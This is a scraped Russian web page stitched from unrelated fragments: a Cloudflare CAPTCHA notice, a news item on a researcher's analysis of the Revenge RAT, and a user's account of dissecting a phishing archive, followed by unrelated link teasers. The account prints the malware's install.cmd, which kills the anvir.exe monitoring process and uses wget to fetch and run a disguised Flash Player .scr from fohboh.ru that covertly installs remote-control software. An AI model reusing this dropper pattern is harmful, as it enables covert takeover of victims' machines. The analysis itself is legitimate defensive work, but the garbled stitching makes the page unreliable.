Трояны для удаленного доступа

Трояны для удаленного доступа

Please complete the security check to access youhack.ru

Why do I have to complete a CAPTCHA?

Completing the CAPTCHA proves you are a human and gives you temporary access to the web property.

What can I do to prevent this in the future?

If you are on a personal connection, like at home, you can run an anti-virus scan on your device to make sure it is not infected with malware.

If you are at an office or shared network, you can ask the network administrator to run a scan across the network looking for misconfigured or infected devices.

Cloudflare Ray ID: 5782e97ead49732f • Your IP : 5.45.65.94 • Performance & security by Cloudflare

Xakep #251. Укрепляем VeraCrypt

Независимый исследователь, известный под псевдонимом Rui, решил изучить новый RAT (Remote Access Trojan) Revenge. Внимание исследователя привлек тот факт, что образчик малвари, загруженный на VirusTotal, показал результат 1/54, то есть практически не обнаруживался антивирусными продуктами. Выяснилось, что Revenge написан человеком, который известен под ником Napoleon, и распространяется совершенно бесплатно.

О трояне Rui случайно узнал из твиттера, где другой исследователь опубликовал ссылку на результаты проверки, произведенной VirusTotal, а также приложил ссылку на арабский форум Dev Point, на котором распространялась малварь. Rui заинтересовался вопросом, перешел на указанный в сообщении форум, где действительно обнаружил ссылку на сайт разработчика вредоноса, размещенный на платформе blogger.com. С сайта исследователь без проблем скачал архив, содержащий Revenge-RAT v.0.1.

Изучение трояна не представляло большой проблемы, так как его автор не озаботился даже базовой защитой и обфускацией кода. В этом свете не совсем ясно, почему сканеры VirusTotal не обнаруживали угрозу, но ответа на этот вопрос Rui пока найти не смог.

Читайте также:  Как удалить уведомления в яндекс браузере

Первая версия малвари появилась на форумах Dev Point еще 28 июня 2016 года. Revenge написан на Visual Basic и, в сравнении с другими RAT, нельзя сказать, что вредонос обладает широкой функциональностью. Исследователь перечислил некоторые возможности малвари: Process Manager, Registry Editor, Remote Connections, Remote Shell, а также IP Tracker, который использует для обнаружения местоположения зараженной машины ресурс addgadgets.com. Фактически троян умеет работать кейлоггером, отслеживать жертву по IP-адресу, перехватывать данные из буфера, может составить список установленных программ, хостит файловый редактор, умеет редактировать список автозагрузки ОС, получает доступ к веб-камере жертвы и содержит дампер для паролей. Автор малвари, Napoleon, не скрывает, что его «продукт» находится в стадии разработки, и именно поэтому пока распространяется бесплатно.

Содержимое архива, скачанного Rui

«Такое чувство, что я зря потратил время, увидев этот результат 1/54 с VirusTotal, — подводит итог исследователь. — Автор [трояна] даже не попытался спрятать код хоть как-то, а архитектура слаба и банальна. Хорошо, что автор не пытается продавать свой RAT и, вероятно, только учится кодить. В любом случае, удивительно (или нет), что такие простейшие инструменты по-прежнему способны успешно скомпрометировать некоторые системы, что и демонстрирует нам видео на YouTube, размещенное автором [малвари]».

Результаты своих изысканий исследователь передал операторам VirusTotal, и теперь рейтинг обнаружения Revenge уже составляет 41/57. Так как некоторые известные антивирусы по-прежнему «не видят» трояна, Rui пишет, что «это просто демонстрирует, насколько ущербна вся антивирусная индустрия в целом».

Сегодня знакомая пожаловалась, что примудрилась подхватить вирус, загрузив вложение из полученого на электронную почту письма. Она фрилансер, поэтому архив с названием «Техническое задание.rar» не вызвал у нее подозрения, на расширение файла *.scr в архиве тоже не обратила внимания.
В письме речь шла о предложении работы, правда с кучей ошибок, скорее всего, автор не сильно владеет русским языком.
Файл запустила, ничего не увидела, да и забыла, пока на следующий день не начала получать письма, что с ее адреса рассылаются ссылки на вирусы. Как позже выяснилось, на эти письма с ее почты приходил ответ в стиле: «оййй йййоооооййй и што типер делат то».
Просканировали компьютер антивирусом, нашли какой-то один троян, да и успокоились. Я заново скачал себе тот архив с целью покопаться в нем. Аваст сразу стал ругаться при попытке распаковать архив, нод32 не среагировал. Отключил Аваст, scr переименовал в rar, распаковал, и получил три файла: error.vbs, install.cmd, wget.exe.
Содержимое файла error.vbs:

Читайте также:  Как проверить дабл клик на мышке

Содержимое файла stall.cmd:
@echo off
start error.vbs
start http://adobe.com
@taskkill /f /im anvir.exe
@wget.exe http://fohboh.ru/files/Adobe.Flash.Player.16.0.scr
start Adobe.Flash.Player.16.0.scr

wget.exe — консольная программа для загрузки файлов по сети.
Здесь все понятно, это только загрузчик, основная часть находится на сайте fohboh.ru
Сайт сам по себе непростой, содержимое сразу на нескольких языках, по адресу fohboh.ru/files находятся три *.scr — файла:

  • Adobe.Flash.Player.15.0.scr
  • Adobe.Flash.Player.16.0.scr
  • Adobe.Flash.Player.17.0.scr

Скачиваю все три, натравливаю туда Аваст, и с немалым удивлением вижу, что он к ним никаких претензий не имеет. Описаным выше способом распаковываю Adobe.Flash.Player.16.0.scr, внутри находится файл system32.msi.
Распаковываю файл через командную строку: msiexec /a c:system32.msi /qb TARGETDIR=c:vir.
В папке vir появляется папка program filesCommon Files, в ней папки Logs и Printer, а также 15 файлов, среди которых rutserv.exe и rfusclient.exe.
С помощью гугла выясняю, что это Remote Manipulator System — решение для удаленного управления компьютерами, как написано на www.ixbt.com/soft/remote-manipulator.shtml.
Rutserv.exe при запуске показывает: Ваш ID: 446-345-503; ваш пароль: 1576; доступен для соединений.
Rfusclient.exe запускаться отказался, скорее всего из-за того, что находится не в «нужной» папке, хотя кто его знает.
Проверяем пострадавший компьютер, и в папке Program FilesCommon Files находятся все те же файлы и папка Printer, а в диспетчере задач — два процесса rfusclient.exe. Папки Logs нету, я так понимаю, неизвестный герой затер ее, причем один из бесплатных анделейтов ее не нашел, а сильнее искать не было особого желания, да и компьютер не мой, чтобы его надолго отбирать. Все файлы удалил, пароли все сменили. Whois говорит что регистратором fohboh.ru является reggi.ru, отправил им письмо, может, и отреагируют.
Разбираться, как именно находят компьютер, к которому можно подключиться, не стал, да и не сильно ориентируюсь, в каком направлении копать.
Вот так вот, все гениальное просто — зачем грузить вирус, который не будет пропущен антивирусом, если можно установить программу для удаленного управления и все сделать своими руками.

Читайте также:  Переустановить виндовс с сохранением программ

Данная статья не подлежит комментированию, поскольку её автор ещё не является полноправным участником сообщества. Вы сможете связаться с автором только после того, как он получит приглашение от кого-либо из участников сообщества. До этого момента его username будет скрыт псевдонимом.

Ссылка на основную публикацию
Тест эксель на собеседовании
Если вы хоть раз пытались устроиться на работу или же работаете на должности, в круг обязанностей которой входит принятие людей...
Тарифы мтс смарт 400 руб
С того момента как тариф «Смарт» стал доступен для активации, он претерпел множество изменений. Они касаются размера абонентской платы, количества...
Тарифы ростелекома на домашний интернет
Полный список актуальных тарифов Ростелеком для города Москва. Подключай тарифы Rostelecom в Москве бесплатно и пользуйся качественными услугами интернета и...
Тестирование cd и dvd дисков
В этой статье я опишу программу тест Nero CD DVD Speed, которая разработана компанией "Nero Softwsre AG". С помощью программы...
Adblock detector